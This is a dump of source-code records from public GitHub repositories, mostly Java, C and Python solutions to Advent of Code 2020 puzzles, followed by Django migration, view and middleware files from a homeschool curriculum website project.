BigInteger number) {\n for (int i = 0; i < preamble.size(); i++) {\n for (int j = i; j < preamble.size(); j++) {\n if (preamble.get(i).add(preamble.get(j)).equals(number)) {\n return true;\n }\n }\n }\n\n return false;\n }\n public static void main(String[] args) {\n BigInteger first_invalid = new BigInteger(\"0\");\n //PART I\n ArrayList<BigInteger> preamble = new ArrayList<>();\n try {\n File input = new File(\"inputChallenge9.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n\n if (!row.equals(\"\")) {\n BigInteger newNumber = new BigInteger(row);\n\n if (preamble.size() == 25) {\n boolean valid = check_number(preamble, newNumber);\n if (!valid) {\n first_invalid = newNumber;\n System.out.println(\"Result Part I: \" + newNumber);\n break;\n }\n preamble.remove(0);\n }\n\n preamble.add(newNumber);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n //PART II\n ArrayList<BigInteger> input_numbers = new ArrayList<>();\n try {\n File input = new File(\"inputChallenge9.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n\n if (!row.equals(\"\")) {\n BigInteger newNumber = new BigInteger(row);\n input_numbers.add(newNumber);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n BigInteger result = checkSumOfAllSubsets(input_numbers, first_invalid);\n\n System.out.println(\"Result Part II: \" + result);\n\n }\n}\n"
},
{
"alpha_fraction": 0.5036858320236206,
"alphanum_fraction": 0.5072299242019653,
"avg_line_length": 35.17435836791992,
"blob_id": "2514e128f8d6adf537a7282ed38e3baeae262956",
"content_id": "f03779fce086ea133c3d98e2f747910ee6e63655",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7054,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 195,
"path": "/Challenge16/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.math.BigInteger;\nimport java.util.*;\n\npublic class Main {\n\n private static ArrayList<Integer> valid_values_Part_I;\n private static int invalid;\n private static HashMap<String, ArrayList<Integer>> valid_values;\n private static HashMap<String, ArrayList<Integer>> possible_indices;\n private static String my_ticket;\n\n private static ArrayList <Integer> removeDuplicates(ArrayList<Integer> list) {\n LinkedHashSet<Integer> hashSet = new LinkedHashSet<>(list);\n return new ArrayList<>(hashSet);\n }\n\n private static void process_notes_Part_I(String entry) {\n String[] words = entry.split(\" \");\n\n for (String word : words) {\n if (word.contains(\"-\")) {\n Integer lowerBound = Integer.parseInt(word.split(\"-\")[0]);\n Integer upperBound = Integer.parseInt(word.split(\"-\")[1]);\n while (lowerBound <= upperBound) {\n valid_values_Part_I.add(lowerBound);\n lowerBound++;\n }\n }\n }\n\n }\n\n private static void process_row_Part_I(String entry) {\n String[] values = entry.split(\",\");\n for (String value : values) {\n if (!valid_values_Part_I.contains(Integer.parseInt(value))){\n invalid = invalid + Integer.parseInt(value);\n }\n }\n }\n\n private static void initialize_possible_indices() {\n possible_indices = new HashMap<>();\n\n int n = valid_values.size();\n\n for (Map.Entry entry : valid_values.entrySet()) {\n possible_indices.put((String) entry.getKey(), new ArrayList<>());\n for (int i = 0; i < n; i++) {\n possible_indices.get(entry.getKey()).add(i);\n }\n\n }\n }\n\n private static boolean valid_ticket(String entry) {\n String[] values = entry.split(\",\");\n if (values.length != valid_values.size()) {\n return false;\n }\n\n for (String value : values) {\n if (!valid_values_Part_I.contains(Integer.parseInt(value))){\n return false;\n }\n }\n return true;\n }\n\n private static void process_notes_Part_II(String entry) {\n String[] words = entry.split(\":\");\n String[] numberRanges = words[1].split(\" \");\n ArrayList<Integer> number_values = new ArrayList<>();\n\n for (String word : numberRanges) {\n if (word.contains(\"-\")) {\n Integer lowerBound = Integer.parseInt(word.split(\"-\")[0]);\n Integer upperBound = Integer.parseInt(word.split(\"-\")[1]);\n while (lowerBound <= upperBound) {\n number_values.add(lowerBound);\n lowerBound++;\n }\n }\n }\n\n valid_values.put(words[0], number_values);\n }\n\n private static void process_row_Part_II(String entry) {\n String[] ticket_values = entry.split(\",\");\n for (int i = 0; i < ticket_values.length; i++) {\n for (Map.Entry valid_value_range : valid_values.entrySet()) {\n if (!((ArrayList) valid_value_range.getValue()).contains(Integer.parseInt(ticket_values[i]))){\n ((ArrayList) possible_indices.get(valid_value_range.getKey())).remove((Integer) i);\n }\n }\n }\n }\n\n private static void get_final_indices() {\n int counter = 0;\n for (Map.Entry entry : possible_indices.entrySet()) {\n counter = counter + ((ArrayList)entry.getValue()).size();\n }\n\n while (counter > possible_indices.size()) {\n for (Map.Entry entry : possible_indices.entrySet()) {\n if (((ArrayList)entry.getValue()).size() == 1) {\n for (Map.Entry entry1 : possible_indices.entrySet()) {\n if (((ArrayList)entry1.getValue()).contains(((ArrayList)entry.getValue()).get(0)) && entry != entry1) {\n //System.out.println(((ArrayList) entry.getValue()).get(0));\n ((ArrayList)entry1.getValue()).remove(((ArrayList)entry.getValue()).get(0));\n }\n }\n counter = counter - 1;\n //break;\n }\n }\n }\n }\n\n private static BigInteger process_my_ticket() {\n BigInteger result = new BigInteger(\"1\");\n String[] ticket = my_ticket.split(\",\");\n for (Map.Entry field : possible_indices.entrySet()) {\n String[] name = ((String) field.getKey()).split(\" \");\n if (name.length == 1) {\n continue;\n }\n\n if (name[0].equals(\"departure\")) {\n result = result.multiply(new BigInteger(ticket[(int) ((ArrayList) field.getValue()).get(0)]));\n }\n }\n\n return result;\n }\n\n public static void main(String[] args) {\n valid_values_Part_I = new ArrayList<>();\n valid_values = new HashMap<>();\n invalid = 0;\n boolean nearbyTickets = false;\n boolean myTicket = false;\n try {\n File input = new File(\"inputChallenge16.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n if (row.equals(\"your ticket:\")) {\n myTicket = true;\n } else if (row.equals(\"nearby tickets:\")) {\n myTicket = false;\n nearbyTickets = true;\n //Part I stuff\n valid_values_Part_I = removeDuplicates(valid_values_Part_I);\n Collections.sort(valid_values_Part_I);\n //Part II stuff\n initialize_possible_indices();\n } else if (!row.equals(\"\") && myTicket) {\n my_ticket = row;\n } else if (!row.equals(\"\") && nearbyTickets) {\n //Part I stuff\n process_row_Part_I(row);\n //Part II stuff\n if (valid_ticket(row)) {\n process_row_Part_II(row);\n }\n } else if (!row.equals(\"\")) {\n process_notes_Part_I(row);\n process_notes_Part_II(row);\n }\n }\n\n get_final_indices();\n\n for (Map.Entry entry : possible_indices.entrySet()) {\n System.out.println(entry.getKey());\n for (Object indices : (ArrayList) entry.getValue()) {\n System.out.println(indices);\n }\n }\n\n System.out.println();\n System.out.println(\"Result Part I: \" + invalid);\n BigInteger result = process_my_ticket();\n System.out.println(\"Result Part II: \" + result);\n\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5206896662712097,
"alphanum_fraction": 0.5396551489830017,
"avg_line_length": 26.294116973876953,
"blob_id": "9984bba2b3eaeb543ef63cd02e019362d0647820",
"content_id": "955ef76b275fb2b6edea5ec30a5599d03bb4fafb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4640,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 170,
"path": "/Challenge5.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "//first 7 chars describe the row and are \\in {F, B},\n//eqivalent to {0, 1}\n//FBFBBFF = 0101100 = 44, so row 44;\n//last 3 chars describe the column and are \\in {L, R},\n//eqivalent to {0, 1}\n//RLR = 101 = 5, so 5th column\n// SEAT_ID = row# * 8 + column#\n\n//What is the highest seat ID?\n\n//TODO: functions that compute the row, the column and thenthe seat id; loop over all entries and compare\n\n#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n#include <math.h>\n\n//array is stolen\ntypedef struct {\n int *array;\n size_t used;\n size_t size;\n} Array;\n\nvoid initArray(Array *a, size_t initialSize) {\n a->array = malloc(initialSize * sizeof(int));\n a->used = 0;\n a->size = initialSize;\n}\n\nvoid insertArray(Array *a, int element) {\n // a->used is the number of used entries, because a->array[a->used++] updates a->used only *after* the array has been accessed.\n // Therefore a->used can go up to a->size\n if (a->used == a->size) {\n a->size *= 2;\n a->array = realloc(a->array, a->size * sizeof(int));\n }\n a->array[a->used++] = element;\n}\n\nvoid freeArray(Array *a) {\n free(a->array);\n a->array = NULL;\n a->used = a->size = 0;\n}\n\n//so is sorting\nvoid swap(int* xp, int* yp)\n{\n int temp = *xp;\n *xp = *yp;\n *yp = temp;\n}\n\n// Function to perform Selection Sort\nvoid selectionSort(int arr[], int n)\n{\n int i, j, min_idx;\n\n // One by one move boundary of unsorted subarray\n for (i = 0; i < n - 1; i++) {\n\n // Find the minimum element in unsorted array\n min_idx = i;\n for (j = i + 1; j < n; j++)\n if (arr[j] < arr[min_idx])\n min_idx = j;\n\n // Swap the found minimum element\n // with the first element\n swap(&arr[min_idx], &arr[i]);\n }\n}\n\nint compute_row(char * entry) {\n int result = 0;\n int digit = -1;\n for (int i = strlen(entry) - 4; i >= 0; i--) {\n if (entry[i] == 'F') {\n digit = 0;\n } else if (entry[i] == 'B'){\n digit = 1;\n } else {\n perror(\"wrong input\");\n }\n result = result + digit * (int) pow(2.0, 6.0 - (double) i);\n }\n\n //printf(\"result is %d\\n\", result);\n return(result);\n}\n\nint compute_column(char * entry) {\n int result = 0;\n int digit = -1;\n for (int i = strlen(entry) - 1; i >= 7; i--) {\n //printf(\"i is %d and entry[%d] is %c\\n\", i, i, entry[i]);\n if (entry[i] == 'L') {\n digit = 0;\n } else if (entry[i] == 'R'){\n digit = 1;\n } else {\n printf(\"entry is %s, entry[%d] = %c\\n\", entry, i, entry[i]);\n perror(\"wrong input\");\n }\n //printf(\"i = %d, 2^(9 - i) = %d, digit = %d and digit * power = %d\\n\", i, (int) pow(2.0, 9.0 - (double) i), digit, digit * (int) pow(2.0, 9.0 - (double) i));\n result = result + digit * (int) pow(2.0, 9.0 - (double) i);\n }\n //printf(\"result is %d\\n\", result);\n return(result);\n}\n\nint compute_sID(int * row, int * column) {\n return((* row) * 8 + (* column));\n}\n\nint size_of_array(int * array) {\n return sizeof(* array) / sizeof(array[0]);\n}\n\nint find_missing_value(Array seat_IDs) {\n for (int i = 0; i < seat_IDs.used; i ++) {\n if (seat_IDs.array[i] + 1 != seat_IDs.array[i + 1]) {\n return(seat_IDs.array[i] + 1);\n }\n }\n return(-1);\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge5.txt\", \"r\");\n int row_length = 11;\n char entry[row_length];\n //since seat_id = row# * 8 + column# and row is \\in [0, 127] and column is \\in [0, 7], the largest possible seat_ID is 128 * 8 + 8\n int max = 0;\n Array seat_IDs;\n initArray(&seat_IDs, 1);\n\n while (fgets(entry, row_length, input) != NULL) {\n //NOTE: max is 11, taking the whole string and the '\\0', and leaving the new line character; then there is an extra entry that is '\\n', so we need to take care of that\n if (strcmp(entry, \"\\n\") == 0){\n continue;\n }\n //printf(\"row is %s\\n\", entry);\n\n int row = compute_row(entry);\n int column = compute_column(entry);\n int seat_ID = compute_sID(&row, &column);\n insertArray(&seat_IDs, seat_ID);\n //printf(\"seat_ID %d\\n\", seat_ID);\n if (seat_ID > max) {\n max = seat_ID;\n }\n }\n\n printf(\"max is %d\\n\", max);\n //printf(\"%ld\\n\", seat_IDs.used); // print number of elements\n\n selectionSort(seat_IDs.array, seat_IDs.used);\n\n int missing_value = find_missing_value(seat_IDs);\n printf(\"seat number is %d\\n\", missing_value);\n\n freeArray(&seat_IDs);\n return(0);\n}\n"
},
{
"alpha_fraction": 0.4273092448711395,
"alphanum_fraction": 0.4626505970954895,
"avg_line_length": 27.295454025268555,
"blob_id": "e2bc8fd600398b93a877395d969893d4da919319",
"content_id": "fe2907c31bafc967e077d149394d154dd9bb1389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1245,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 44,
"path": "/Challenge3.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n\nint main() {\n FILE *input;\n //arbitrarily set\n int max = 100000;\n char row[max];\n int length_row;\n int slopes[5][2] = {{1 ,1}, {3, 1}, {5, 1}, {7, 1}, {1, 2}};\n long long int result = 1;\n\n for (int i = 0; i < 5; i++) {\n input = fopen(\"inputChallenge3.txt\", \"r\");\n int n_trees = 0;\n int position = -slopes[i][0];\n int counter = 0;\n counter = 0;\n int row_n = -1;\n\n while (fgets(row, max, input) != NULL) {\n row_n = row_n + 1;\n if (counter == 0) {\n length_row = strlen(row);\n //we have 31 numbers, so indices go from 0 to 30, but length is 32 because of the '\\0' at the end of the row, so we need mod length - 1\n position = (position + slopes[i][0]) % (length_row - 1);\n if (row[position] == '#') {\n n_trees = n_trees + 1;\n }\n counter = slopes[i][1] - 1;\n } else {\n counter = counter - 1;\n }\n }\n\n result = result * n_trees;\n }\n\n printf(\"result is %lld\\n\", result);\n}\n"
},
{
"alpha_fraction": 0.5760202407836914,
"alphanum_fraction": 0.5987721085548401,
"avg_line_length": 40.3283576965332,
"blob_id": "24699dee9a563232abd97148d6afe478332e0b35",
"content_id": "3ebc07b373174f78a0ebc6988b1b41299d0a9a9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2769,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 67,
"path": "/Challenge4.py",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "def valid_byr(key, value):\n return key == \"byr\" and int(value) >= 1920 and int(value) <= 2002\n\ndef valid_iyr(key, value):\n return key == \"iyr\" and int(value) >= 2010 and int(value) <= 2020\n\ndef valid_eyr(key, value):\n return key == \"eyr\" and int(value) >= 2020 and int(value) <= 2030\n\ndef valid_hgt(key, value):\n return (key == \"hgt\" and len(value) == 5 and value.endswith(\"cm\") and int(value[:-2]) >= 150 and int(value[:-2]) <= 193) or (key == \"hgt\" and len(value) == 4 and value.endswith(\"in\") and int(value[:-2]) >= 59 and int(value[:2]) <= 76)\n\ndef valid_hcl(key, value):\n hcl_allowed_symbols = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\n return key == \"hcl\" and value[:1] == \"#\" and len(value) == 7 and set(value[1:]).issubset(hcl_allowed_symbols)\n\ndef valid_ecl(key, value):\n ecl_allowed_values = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n return key == \"ecl\" and len(value) == 3 and value in ecl_allowed_values\n\ndef valid_pid(key, value):\n pid_allowed_values = [str(i) for i in range(0, 10)]\n return key == \"pid\" and len(value) == 9 and set(list(value)).issubset(pid_allowed_values)\n\ndef present_cid(key, value):\n return key == \"cid\"\n\ndef valid_values(key_value_pairs):\n key_value_pair_iter = iter(key_value_pairs.keys())\n for key in key_value_pair_iter:\n value = key_value_pairs[key]\n if not valid_byr(key, value) and not valid_iyr(key, value) and not valid_eyr(key, value) and not valid_hgt(key, value) and not valid_hcl(key, value) and not valid_ecl(key, value) and not valid_pid(key, value) and not present_cid(key, value):\n return False\n return True\n\ndef valid_passport(keys, encountered_key_value_pairs):\n for key in keys:\n if key != \"cid\" and key not in encountered_key_value_pairs:\n return False\n if not valid_values(encountered_key_value_pairs):\n return False\n return True\n\ndef process_line(line, encountered_key_value_pairs):\n key_value_pairs = line.split(' ')\n for key_value_pair in key_value_pairs:\n key = key_value_pair.split(':')[0]\n value = key_value_pair.split(':')[1]\n encountered_key_value_pairs[key] = value\n\ndef main():\n input = open(\"inputChallenge4.txt\", \"r\");\n\n n_valid = 0\n keys = [\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\", \"cid\"]\n encountered_key_value_pairs = {}\n\n for line in input:\n if line in ['\\n', '\\r\\n']:\n if valid_passport(keys, encountered_key_value_pairs):\n n_valid = n_valid + 1\n encountered_key_value_pairs = {}\n else:\n line = line.strip('\\n')\n process_line(line, encountered_key_value_pairs);\n print(\"number of valid passports: \", n_valid)\nmain()\n"
},
{
"alpha_fraction": 0.49356725811958313,
"alphanum_fraction": 0.4988304078578949,
"avg_line_length": 32.52941131591797,
"blob_id": "2572704f242d29af7c313a3e6c269773b2a1ca6b",
"content_id": "3f638d4c6ba6d452e1bf0c833e5f1225a32d5465",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3420,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 102,
"path": "/Challenge8/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.util.ArrayList;\nimport java.util.Scanner;\n\npublic class Main {\n\n private static int accumulator;\n\n private static boolean run_program(ArrayList<Integer> already_seen_indices, ArrayList<String> program) {\n int index = 0;\n while (index < program.size()) {\n if (already_seen_indices.contains(index)) {\n return false;\n }\n\n already_seen_indices.add(index);\n String[] command = program.get(index).split(\" \");\n\n if (command[0].equals(\"jmp\")) {\n index += Integer.parseInt(command[1]);\n continue;\n }\n\n if (command[0].equals(\"acc\")) {\n accumulator += Integer.parseInt(command[1]);\n }\n\n index++;\n }\n\n return true;\n }\n\n //have a while loop that continuously changes a command, checks if it works, if not changes it back, sets a last_changed and continues\n private static void fix_program(ArrayList<String> program) {\n boolean not_good = true;\n int last_changed = -1;\n while (not_good) {\n if (last_changed >= program.size()) {\n System.out.println(\"problem\");\n return;\n }\n for (int i = last_changed + 1; i < program.size(); i++) {\n String[] command = program.get(i).split(\" \");\n if (command[0].equals(\"jmp\")) {\n String newCommand = \"nop\".concat(\" \").concat(command[1]);\n program.set(i, newCommand);\n last_changed = i;\n break;\n } else if (command[0].equals(\"nop\")) {\n String newCommand = \"jmp\".concat(\" \").concat(command[1]);\n program.set(i, newCommand);\n last_changed = i;\n break;\n }\n\n }\n\n accumulator = 0;\n not_good = !run_program(new ArrayList<>(), program);\n\n if (not_good) {\n String[] command = program.get(last_changed).split(\" \");\n if (command[0].equals(\"jmp\")) {\n String newCommand = \"nop\".concat(\" \").concat(command[1]);\n program.set(last_changed, newCommand);\n } else if (command[0].equals(\"nop\")) {\n String newCommand = \"jmp\".concat(\" \").concat(command[1]);\n program.set(last_changed, newCommand);\n }\n }\n }\n }\n\n public static void main(String[] args) {\n accumulator = 0;\n ArrayList<String> program;\n program = new ArrayList<>();\n ArrayList<Integer> already_seen_indices = new ArrayList<>();\n\n try {\n File input = new File(\"inputChallenge8.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n if (!row.equals(\"\")) {\n program.add(row);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n run_program(already_seen_indices, program);\n System.out.println(\"Result Part I: \" + accumulator);\n\n fix_program(program);\n System.out.println(\"Result Part II: \" + accumulator);\n }\n\n}\n"
},
{
"alpha_fraction": 0.5865657329559326,
"alphanum_fraction": 0.5865657329559326,
"avg_line_length": 17.875,
"blob_id": "c23a4531c027ccdc82ad02485b0f569c4f90cc19",
"content_id": "da7c3c3872955e3b2843dfac74ad8b039e26af02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1057,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 56,
"path": "/Challenge7/src/Node.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\n\nclass Node {\n private int name;\n private String finish;\n private String colour;\n private List<Node> parents;\n private HashMap<Node, Integer> children;\n\n Node() {\n parents = new ArrayList<>();\n children = new HashMap<>();\n }\n\n public int getName() {\n return name;\n }\n\n void setName(int name) {\n this.name = name;\n }\n\n public String getFinish() {\n return finish;\n }\n\n void setFinish(String finish) {\n this.finish = finish;\n }\n\n public String getColour() {\n return colour;\n }\n\n void setColour(String colour) {\n this.colour = colour;\n }\n\n public List<Node> getParents() {\n return parents;\n }\n\n public void addParent(Node parent) {\n this.parents.add(parent);\n }\n\n public HashMap<Node, Integer> getChildren() {\n return children;\n }\n\n public void addChild(Node child, Integer number) {\n children.put(child, number);\n }\n}\n"
},
{
"alpha_fraction": 0.5210330486297607,
"alphanum_fraction": 0.5315985083580017,
"avg_line_length": 28.715116500854492,
"blob_id": "dac5e43582896302caf1987dca1938ebdcda63d4",
"content_id": "fe82c52604fe4f469c9ed278d4b0a9939bbc4ec6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5111,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 172,
"path": "/Challenge6.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n#include <math.h>\n#include <ctype.h>\n\n//3427\n//array is stolen\ntypedef struct {\n char * array;\n size_t used;\n size_t size;\n} Array;\n\nvoid initArray(Array *a, size_t initialSize) {\n a->array = malloc(initialSize * sizeof(int));\n a->used = 0;\n a->size = initialSize;\n}\n\nvoid insertArray(Array *a, int element) {\n // a->used is the number of used entries, because a->array[a->used++] updates a->used only *after* the array has been accessed.\n // Therefore a->used can go up to a->size\n if (a->used == a->size) {\n a->size *= 2;\n a->array = realloc(a->array, a->size * sizeof(char));\n }\n a->array[a->used++] = element;\n}\n\nvoid freeArray(Array *a) {\n free(a->array);\n a->array = NULL;\n a->used = a->size = 0;\n}\n\n//from here on it is not\nvoid removeArray(Array *a, int * position) {\n if (*position >= 0 && *position < a -> used) {\n for (int i = * position; i < a -> used; i++) {\n a -> array[i] = a -> array[i + 1];\n }\n a -> used = (a -> used) - 1;\n } else {\n perror(\"position is not valid\\n\");\n }\n}\n\nvoid print_Array(Array *a) {\n for (int i = 0; i < a -> used; i++) {\n printf(\"%c, \", a -> array[i]);\n }\n printf(\"\\n\");\n}\n\nbool is_value_in_Array(Array * array, char * value) {\n for (int i = 0; i < array -> used; i++) {\n if (array -> array[i] == *value) {\n return true;\n }\n }\n return false;\n}\n\nbool is_value_in_array(char * array, char * value) {\n for (int i = 0; i < strlen(array); i++) {\n if (array[i] == *value) {\n return true;\n }\n }\n return false;\n}\n\nvoid remove_illegal_symbols_from_Array(Array *a, char * alphabet) {\n int counter = 0;\n for (int i = 0; i < a -> used; i++) {\n if (a -> array[i] == NULL || !is_value_in_array(alphabet, &(a -> array[i]))) {\n counter = counter + 1;\n for (int j = i; j < a -> used; j++) {\n a -> array[j] = a -> array[j + 1];\n }\n if (a -> used == 1 && is_value_in_array(alphabet, &(a -> array[0]))) {\n insertArray(a, '\\0');\n break;\n } else {\n a -> used = (a -> used) - counter;\n }\n }\n }\n}\n\nvoid process_row_any(char * entry, Array * positive_questions_any) {\n for (int i = 0; i < strlen(entry) - 1; i++) {\n if (!is_value_in_Array(positive_questions_any, &entry[i])) {\n insertArray(positive_questions_any, entry[i]);\n }\n }\n}\n\nvoid process_row_all(char * entry, Array * positive_questions_all, bool * new, char * alphabet) {\n if (*new) {\n for (int i = 0; i < strlen(entry) - 1; i++) {\n if (is_value_in_array(alphabet, &entry[i])) {\n insertArray(positive_questions_all, entry[i]);\n }\n }\n } else {\n for (int i = (positive_questions_all -> used) - 1; i >= 0; i--) {\n if (!is_value_in_array(entry, &positive_questions_all -> array[i])){\n positive_questions_all -> array[i] = NULL;\n remove_illegal_symbols_from_Array(positive_questions_all, alphabet);\n }\n }\n }\n printf(\"List of current positively answered questions: \");\n print_Array(positive_questions_all);\n\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge6.txt\", \"r\");\n //input = fopen(\"exampleInputC6.txt\", \"r\");\n //input = fopen(\"input2C6.txt\", \"r\");\n int max_row_length = 10000;\n char entry[max_row_length];\n Array positive_questions_any;\n Array positive_questions_all;\n initArray(&positive_questions_any, 1);\n initArray(&positive_questions_all, 1);\n int result_any = 0;\n int result_all = 0;\n bool new = true;\n\n char alphabet[27];\n int i = 0;\n for (char c = 'a'; c <= 'z'; c++) {\n alphabet[i] = c;\n i++;\n }\n alphabet[26] = '\\0';\n\n while (fgets(entry, max_row_length, input) != NULL) {\n //NOTE: max is 11, taking the whole string and the '\\0', and leaving the new line character; then there is an extra entry that is '\\n', so we need to take care of that\n if (strcmp(entry, \"\\n\") == 0){\n result_any = result_any + positive_questions_any.used;\n result_all = result_all + positive_questions_all.used;\n printf(\"intermediate result_all is %d\\n\", result_all);\n printf(\"\\n\");\n printf(\"new group\\n\");\n freeArray(&positive_questions_any);\n freeArray(&positive_questions_all);\n initArray(&positive_questions_any, 1);\n initArray(&positive_questions_all, 1);\n new = true;\n continue;\n }\n printf(\"\\n\");\n printf(\"new person, entry is %s\\n\", entry);\n process_row_any(entry, &positive_questions_any);\n process_row_all(entry, &positive_questions_all, &new, alphabet);\n new = false;\n }\n\n printf(\"result for Part 1 is %d\\n\", result_any);\n printf(\"result for Part 2 is %d\\n\", result_all);\n\n return(0);\n}\n"
}
] | 9 |
Lbatson/first-pick-homeschool
|
https://github.com/Lbatson/first-pick-homeschool
|
81914bc56147e68354081ef65e107e7325da1cae
|
3d4b3ef05d208c01ecb7b2a96d17253bceef4628
|
ba81b287fbfbf5bbbc13a16fbc1452244961b818
|
refs/heads/master
| 2023-01-24T04:05:31.815963 | 2020-09-25T20:28:08 | 2020-09-25T20:28:08 | 229,843,569 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5718749761581421,
"alphanum_fraction": 0.5927083492279053,
"avg_line_length": 33.28571319580078,
"blob_id": "0520e7e174516e1bdd782bd88d6a057d69a1f392",
"content_id": "922598224a112efefd058fc3ad8ddd83b84bafbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 28,
"path": "/fphs/curriculums/migrations/0010_auto_20200529_0201.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-05-29 02:01\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0009_review\"),\n ]\n\n operations = [\n migrations.RemoveField(model_name=\"curriculum\", name=\"consumable\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"format\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"levels\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"price\",),\n migrations.RemoveField(model_name=\"curriculum\", name=\"subscription\",),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"religious_preference\",\n field=models.CharField(\n choices=[(\"R\", \"Religious\"), (\"N\", \"Faith Neutral\"), (\"S\", \"Secular\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.DeleteModel(name=\"Level\",),\n ]\n"
},
{
"alpha_fraction": 0.6080051064491272,
"alphanum_fraction": 0.6086404323577881,
"avg_line_length": 29.86274528503418,
"blob_id": "7a547bd9fbed1b7389881c560e970420404e9704",
"content_id": "950e800703d69dede0e96617272f69b6a0905685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1574,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 51,
"path": "/fphs/utils/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.views.generic.edit import FormView\nfrom django.views.decorators.http import require_GET\nfrom django.utils.translation import gettext_lazy as _\nfrom django.urls import reverse\n\nfrom .forms import ContactForm\nfrom .models import Contact\n\n\n@require_GET\ndef robots_txt(request):\n isProd = request.get_host().split(\".\")[0] == \"firstpickhomeschool\"\n lines = [\n \"User-Agent: *\",\n f\"Disallow: {'/admin' if isProd else '/'}\",\n f\"Sitemap: { request.scheme }://{ request.get_host() }/sitemap.xml\",\n ]\n return HttpResponse(\"\\n\".join(lines), content_type=\"text/plain\")\n\n\nclass ContactView(FormView):\n form_class = ContactForm\n template_name = \"pages/contact.html\"\n\n def form_invalid(self, form):\n if form.errors.as_data()[\"captcha\"]:\n messages.error(\n self.request,\n _(\"Sorry, but we're unable to process your request at this time.\"),\n )\n return super().form_invalid(form)\n\n def form_valid(self, form):\n Contact(\n email=form.cleaned_data[\"email\"], message=form.cleaned_data[\"message\"]\n ).save()\n return super().form_valid(form)\n\n def get_success_url(self):\n messages.success(\n self.request,\n _(\n \"\"\"\n Thanks for contacting First Pick Homeschool!\n We appreciate you reaching out to us and we will get back to you soon.\n \"\"\"\n ),\n )\n return reverse(\"home\")\n"
},
{
"alpha_fraction": 0.7007672786712646,
"alphanum_fraction": 0.7007672786712646,
"avg_line_length": 34.54545593261719,
"blob_id": "e8d8e2fcba14efbb8d16551661b09f2f1776f906",
"content_id": "f04f8ef378ec5ad49026ccd3eca7795e579877f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/fphs/utils/middleware.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
